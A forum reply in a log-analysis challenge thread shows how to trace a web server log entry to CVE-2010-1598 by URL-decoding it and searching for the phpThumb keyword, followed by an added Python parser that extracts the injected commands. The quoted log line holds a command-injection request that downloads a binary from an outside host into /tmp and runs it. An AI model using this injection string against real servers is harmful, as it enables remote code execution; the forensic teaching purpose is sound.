[TBD Challenge] Log Analysis Challenge #1
01-07-2013, 11:00 PM,
Post: #16
RE: [TBD Challenge] Log Analysis Challenge #1
(01-07-2013, 08:33 PM)matz Wrote:
Code:
1. CVE-2010-1598

Where did you get this? OK

Look at the first request that IP sent to the server.. for example, this one..

Code:
156.17.223.158 - - [26/Dec/2011:21:08:49 +0800] "GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 534 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"

That's a bit hard to read because the URL is encoded; google any "url decode" tool and decode the string, and you get this..

Code:
156.17.223.158 - - [26/Dec/2011:21:08:49  0800] "GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality  75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1" 404 534 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"

Now, in that string, look for any important keyword that can help you find the CVE; for me the important keyword is phpThumb.php?src=file.jpg&fltr

Once you have the keyword, open up Google and search for it.. ;d

https://encrypted.google.com/#output=sea...jpg%26fltr

You will find many sites that refer to the keyword you searched for, with text almost identical to the words in the log..

For example, out of all those results, open the first site..

http://blog.spiderlabs.com/2011/12/honey...ected.html

As soon as you open it, the CVE is displayed right there: CVE-2010-1598

That's the answer ;d

On Google, you can also just search for this -> phpThumb.php?src=file.jpg&fltr "CVE"

;d
Reply
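The manual decode-and-read step from the post above, as an added Python example (not part of the original post; `analyze` and its field names are hypothetical). It decodes only the request target, splits the query into parameters before decoding, and lists the shell commands appended after the first `;` in a parameter value.

```python
import re
from urllib.parse import unquote

# Log line quoted in the post above (Apache combined format), split for width.
SAMPLE = (
    '156.17.223.158 - - [26/Dec/2011:21:08:49 +0800] "GET /wp-content/themes/'
    'comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20'
    '-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls'
    '%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%20'
    '0755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" '
    '404 534 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 '
    'Firefox/8.0"'
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

def analyze(line):
    """Return client, script, status and injected commands, or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path, _, query = m['target'].partition('?')
    injected = {}
    # Split on '&' before decoding, so an encoded %26 cannot fake a parameter.
    for pair in filter(None, query.split('&')):
        name, _, raw = pair.partition('=')
        value = unquote(raw)  # unquote() leaves a literal '+' untouched
        # '|' is normal in a phpThumb filter (blur|9); ';' is the shell separator.
        if ';' in value:
            parts = [p.strip() for p in value.split(';')]
            injected[unquote(name)] = [p for p in parts[1:] if p]
    return {
        'ip': m['ip'],
        'timestamp': m['ts'],
        'script': path.rsplit('/', 1)[-1],  # keyword to search alongside "CVE"
        'status': int(m['status']),         # 404: the path did not exist here
        'injected': injected,
    }

if __name__ == '__main__':
    result = analyze(SAMPLE)
    print(result['ip'], result['script'], result['status'])
    for param, commands in result['injected'].items():
        for command in commands:
            print(f'  {param}: {command}')
```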